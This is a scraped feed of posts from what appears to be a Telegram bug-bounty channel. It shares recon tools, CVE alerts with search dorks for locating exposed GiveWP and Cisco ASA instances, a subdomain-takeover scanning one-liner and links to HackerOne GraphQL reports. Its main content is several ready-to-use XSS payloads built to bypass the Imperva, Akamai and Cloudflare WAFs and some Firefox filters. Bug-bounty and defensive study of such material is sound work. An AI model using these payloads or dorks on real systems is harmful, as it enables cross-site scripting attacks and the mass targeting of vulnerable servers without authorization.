π§βπ»CloakQuest3r - Uncover the true IP address of websites safeguarded by Cloudflare & Others
https://github.com/spyboy-productions/CloakQuest3r
https://github.com/spyboy-productions/CloakQuest3r
2π₯12π3
Argus is an all-in-one information gathering tool crafted for ethical hackers and cybersecurity experts. It seamlessly integrates network analysis, web exploration, and threat detection, all in a sleek and intuitive interface. Argus turns complex reconnaissance into an art of simplicity.
---
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - jasonxtn/Argus: The Ultimate Information Gathering Toolkit
The Ultimate Information Gathering Toolkit. Contribute to jasonxtn/Argus development by creating an account on GitHub.
π7
CVE-2024-9634: RCE in GiveWP WordPress Plugin, 9.8 rating π₯
Another one critical vulnerability in GiveWP. This time, attackers can inject PHP code using one parameter.
Search at Netlas.io:
π Link: https://nt.ls/9tUYx
π Dork: http.body:"plugins/give/assets/dist"
Read more: https://github.com/advisories/GHSA-6fx6-wrpf-cpgv
Another one critical vulnerability in GiveWP. This time, attackers can inject PHP code using one parameter.
Search at Netlas.io:
π Link: https://nt.ls/9tUYx
π Dork: http.body:"plugins/give/assets/dist"
Read more: https://github.com/advisories/GHSA-6fx6-wrpf-cpgv
π5β€3
POC for CVE-2024-4577 PHP CGI Argument Injection π₯ π₯ π₯
Nuclei Template: https://github.com/11whoami99/CVE-2024-4577/blob/main/CVE-2024-4577.yaml
Nuclei Template: https://github.com/11whoami99/CVE-2024-4577/blob/main/CVE-2024-4577.yaml
1β€9π2
Here are few Good GraphQl report to learn more about it.
1. hackerone.com/reports/2048725
2. hackerone.com/reports/2524939
3. hackerone.com/reports/2357012
4. hackerone.com/reports/2122671
5. hackerone.com/reports/2207248
6. hackerone.com/reports/1864188
7. hackerone.com/reports/1085332
8. hackerone.com/reports/1084904
9. hackerone.com/reports/1293377
10. hackerone.com/reports/1192460
1. hackerone.com/reports/2048725
2. hackerone.com/reports/2524939
3. hackerone.com/reports/2357012
4. hackerone.com/reports/2122671
5. hackerone.com/reports/2207248
6. hackerone.com/reports/1864188
7. hackerone.com/reports/1085332
8. hackerone.com/reports/1084904
9. hackerone.com/reports/1293377
10. hackerone.com/reports/1192460
HackerOne
Sorare disclosed on HackerOne: Circular based introspetion Query...
## Summary:
Hi Team, Hope you are doing great Sorare graphql Api has introspection enabled by default as per the policy it's meant to be public so they can facilitate their users with Graphql...
Hi Team, Hope you are doing great Sorare graphql Api has introspection enabled by default as per the policy it's meant to be public so they can facilitate their users with Graphql...
π6β€3
Subdomain Takeover POC :
subfinder -d domain | httpx -silent > subdomains.txt ; nuclei -t /root/nuclei-templates/http/takeovers -l subdomains.txt
π8β€1
80% bug bounties is about understanding the application/framework/protocol and (knowing about what exactly are you doing or if it's actually worth doing)
π29π₯4πΏ3β€1
CVE-2024-20329: Improper Neutralization of Command Delimiters in Cisco ASA, 9.9 rating π₯π₯π₯
The vulnerability allows an attacker with low privileges to remotely execute commands via SSH and thus gain full control of the system.
More then 140k instances at Netlas.io:
π Link: https://nt.ls/Rfjme
π Dork: http.body:"/+CSCOE+/logon.html"
Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF
The vulnerability allows an attacker with low privileges to remotely execute commands via SSH and thus gain full control of the system.
More then 140k instances at Netlas.io:
π Link: https://nt.ls/Rfjme
π Dork: http.body:"/+CSCOE+/logon.html"
Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF
β€3πΏ2π1
Please open Telegram to view this post
VIEW IN TELEGRAM
Gist
Iβve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques.β¦
Iβve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques. After extensive research, Iβve compiled a list of headers y...
1β€12π3πΏ1
β‘οΈFound a security vulnerability in any site?
β Check if it has a public bug bounty program:
https://xplo1t-sec.github.io/bugbounty-lookup/
#BugBounty #bugbountytips
β Check if it has a public bug bounty program:
https://xplo1t-sec.github.io/bugbounty-lookup/
#BugBounty #bugbountytips
1β€6π₯3π³1
A solid XSS payload that bypasses Imperva WAF βοΈ
#infosec #cybersec #bugbountytips
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
#infosec #cybersec #bugbountytips
1π₯9π³3
Reflected XSS Akami Waf Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:βοΈ
/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
1π₯5π4π³2
Cloudflare #XSS WAF Bypass by @nav1n0x
Payload:
#cybersec #bugbountytips #infosec
Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
#cybersec #bugbountytips #infosec
1π10πΏ3π³1
an XSS payload to bypass some waf & filters in Firefox
#infosec #cybersec #bugbountytips
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
#infosec #cybersec #bugbountytips
1β€9